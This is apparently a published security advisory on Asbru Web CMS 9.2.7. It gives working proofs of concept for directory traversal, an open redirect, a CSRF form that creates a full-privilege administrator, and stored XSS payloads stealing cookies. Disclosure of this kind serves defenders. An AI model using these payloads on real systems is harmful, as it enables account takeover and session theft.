Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal
Posted on 06 April 2016
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities Vendor: Asbru Ltd. Product web page: http://www.asbrusoft.com Affected version: 9.2.7 Summary: Ready to use, full-featured, database-driven web content management system (CMS) with integrated community, databases, e-commerce and statistics modules for creating, publishing and managing rich and user-friendly Internet, Extranet and Intranet websites. Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure. Tested on : Apache Tomcat/5.5.23 Apache/2.2.3 (CentOS) Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5314 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php 09.03.2016 -- #1 Directory Traversal: -------------------- http://10.0.0.7/../../../../../WEB-INF/web.xml #2 Open Redirect: -------------- http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk #3 Cross-Site Request Forgery (Add 'administrator' With Full Privileges): ---------------------------------------------------------------------- <html> <body> <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST"> <input type="hidden" name="userinfo" value=" <TEST></TEST> " /> <input type="hidden" name="title" value="Mr" /> <input type="hidden" name="name" value="Chekmidash" /> <input type="hidden" name="organisation" value="ZSL" /> <input type="hidden" name="email" value="test@testingus.io" /> <input type="hidden" name="gender" value="1" /> <input type="hidden" name="birthdate" value="1984-01-01" /> <input type="hidden" name="birthday" value="01" /> <input type="hidden" name="birthmonth" value="01" /> <input type="hidden" name="birthyear" value="1984" /> <input type="hidden" name="notes" value="CSRFNote" /> <input type="hidden" name="userinfo1" value="" /> <input type="hidden" name="userinfoname" value="" /> <input type="hidden" name="username" value="hackedusername" /> <input type="hidden" name="password" value="password123" /> <input type="hidden" name="userclass" value="administrator" /> <input type="hidden" name="usergroup" value="" /> <input type="hidden" name="usertype" value="" /> <input type="hidden" name="usergroups" value="Account Managers" /> <input type="hidden" name="usergroups" value="Company Bloggers" /> <input type="hidden" name="usergroups" value="Customer" /> <input type="hidden" name="usergroups" value="Event Managers" /> <input type="hidden" name="usergroups" value="Financial Officers" /> <input type="hidden" name="usergroups" value="Forum Moderator" /> <input type="hidden" name="usergroups" value="Human Resources" /> <input type="hidden" name="usergroups" value="Intranet Managers" /> <input type="hidden" name="usergroups" value="Intranet Users" /> <input type="hidden" name="usergroups" value="Newsletter" /> <input type="hidden" name="usergroups" value="Press Officers" /> <input type="hidden" name="usergroups" value="Product Managers" /> <input type="hidden" name="usergroups" value="Registered Users" /> <input type="hidden" name="usergroups" value="Shop Managers" /> <input type="hidden" name="usergroups" value="Subscribers" /> <input type="hidden" name="usergroups" value="Support Ticket Administrators" /> <input type="hidden" name="usergroups" value="Support Ticket Users" /> <input type="hidden" name="usergroups" value="User Managers" /> <input type="hidden" name="usergroups" value="Website Administrators" /> <input type="hidden" name="usergroups" value="Website Developers" /> <input type="hidden" name="users_group" value="" /> <input type="hidden" name="users_type" value="" /> <input type="hidden" name="creators_group" value="" /> <input type="hidden" name="creators_type" value="" /> <input type="hidden" name="editors_group" value="" /> <input type="hidden" name="editors_type" value="" /> <input type="hidden" name="publishers_group" value="" /> <input type="hidden" name="publishers_type" value="" /> <input type="hidden" name="administrators_group" value="" /> <input type="hidden" name="administrators_type" value="" /> <input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" /> <input type="hidden" name="scheduled_publish_email" value="" /> <input type="hidden" name="scheduled_notify" value="" /> <input type="hidden" name="scheduled_notify_email" value="" /> <input type="hidden" name="scheduled_unpublish" value="" /> <input type="hidden" name="scheduled_unpublish_email" value="" /> <input type="hidden" name="invoice_name" value="Icebreaker" /> <input type="hidden" name="invoice_organisation" value="Zero Science Lab" /> <input type="hidden" name="invoice_address" value="nu" /> <input type="hidden" name="invoice_postalcode" value="1300" /> <input type="hidden" name="invoice_city" value="Neverland" /> <input type="hidden" name="invoice_state" value="ND" /> <input type="hidden" name="invoice_country" value="ND" /> <input type="hidden" name="invoice_phone" value="111-222-3333" /> <input type="hidden" name="invoice_fax" value="" /> <input type="hidden" name="invoice_email" value="lab@zeroscience.tld" /> <input type="hidden" name="invoice_website" value="www.zeroscience.mk" /> <input type="hidden" name="delivery_name" value="" /> <input type="hidden" name="delivery_organisation" value="" /> <input type="hidden" name="delivery_address" value="" /> <input type="hidden" name="delivery_postalcode" value="" /> <input type="hidden" name="delivery_city" value="" /> <input type="hidden" name="delivery_state" value="" /> <input type="hidden" name="delivery_country" value="" /> <input type="hidden" name="delivery_phone" value="" /> <input type="hidden" name="delivery_fax" value="" /> <input type="hidden" name="delivery_email" value="" /> <input type="hidden" name="delivery_website" value="" /> <input type="hidden" name="card_type" value="VISA" /> <input type="hidden" name="card_number" value="4444333322221111" /> <input type="hidden" name="card_issuedmonth" value="01" /> <input type="hidden" name="card_issuedyear" value="2016" /> <input type="hidden" name="card_expirymonth" value="01" /> <input type="hidden" name="card_expiryyear" value="2100" /> <input type="hidden" name="card_name" value="Hacker Hackerowsky" /> <input type="hidden" name="card_cvc" value="133" /> <input type="hidden" name="card_issue" value="" /> <input type="hidden" name="card_postalcode" value="1300" /> <input type="hidden" name="content_editor" value="" /> <input type="hidden" name="hardcore_upload" value="" /> <input type="hidden" name="hardcore_format" value="" /> <input type="hidden" name="hardcore_width" value="" /> <input type="hidden" name="hardcore_height" value="" /> <input type="hidden" name="hardcore_onenter" value="" /> <input type="hidden" name="hardcore_onctrlenter" value="" /> <input type="hidden" name="hardcore_onshiftenter" value="" /> <input type="hidden" name="hardcore_onaltenter" value="" /> <input type="hidden" name="hardcore_toolbar1" value="" /> <input type="hidden" name="hardcore_toolbar2" value="" /> <input type="hidden" name="hardcore_toolbar3" value="" /> <input type="hidden" name="hardcore_toolbar4" value="" /> <input type="hidden" name="hardcore_toolbar5" value="" /> <input type="hidden" name="hardcore_formatblock" value="" /> <input type="hidden" name="hardcore_fontname" value="" /> <input type="hidden" name="hardcore_fontsize" value="" /> <input type="hidden" name="hardcore_customscript" value="" /> <input type="hidden" name="startpage" value="" /> <input type="hidden" name="workspace_sections" value="" /> <input type="hidden" name="index_workspace" value="" /> <input type="hidden" name="index_content" value="" /> <input type="hidden" name="index_library" value="" /> <input type="hidden" name="index_product" value="" /> <input type="hidden" name="index_stock" value="" /> <input type="hidden" name="index_order" value="" /> <input type="hidden" name="index_segments" value="" /> <input type="hidden" name="index_usertests" value="" /> <input type="hidden" name="index_heatmaps" value="" /> <input type="hidden" name="index_user" value="" /> <input type="hidden" name="index_websites" value="" /> <input type="hidden" name="menu_selection" value="" /> <input type="hidden" name="statistics_reports" value="" /> <input type="hidden" name="sales_reports" value="" /> <input type="submit" value="Initiate" /> </form> </body> </html> #4 Stored Cross-Site Scripting: ---------------------------- a) POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1 Host: 10.0.0.7 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="webeditor_stylesheet" /stylesheet.jsp?id=1,1&device=&useragent=& ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="restore" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="archive" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publish" Save & Publish ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_publish" 2016-03-09 13:29 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_unpublish" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="checkedout" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="revision" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="title" "><script>alert(document.cookie)</script> ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="searchable" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="menuitem" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file"; filename="test.svg" Content-Type: image/svg+xml testsvgxxefailed ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file_data" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="server_filename" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentdelivery" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image1" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image2" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image3" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfo" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentation" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="author" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="description" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="keywords" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfoname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationvalue" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentpackage" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentclass" image ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentgroup" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contenttype" Photos ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version_master" 0 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="device" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usersegment" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usertest" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_top" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_up" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_previous" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_next" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_first" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_last" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="related" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="selectrelated" ------WebKitFormBoundarygqlN2AtccVFqx0YN-- b) POST /webadmin/fileformats/create_post.jsp HTTP/1.1 Host: 10.0.0.7 filenameextension="><script>alert(document.cookie)</script>
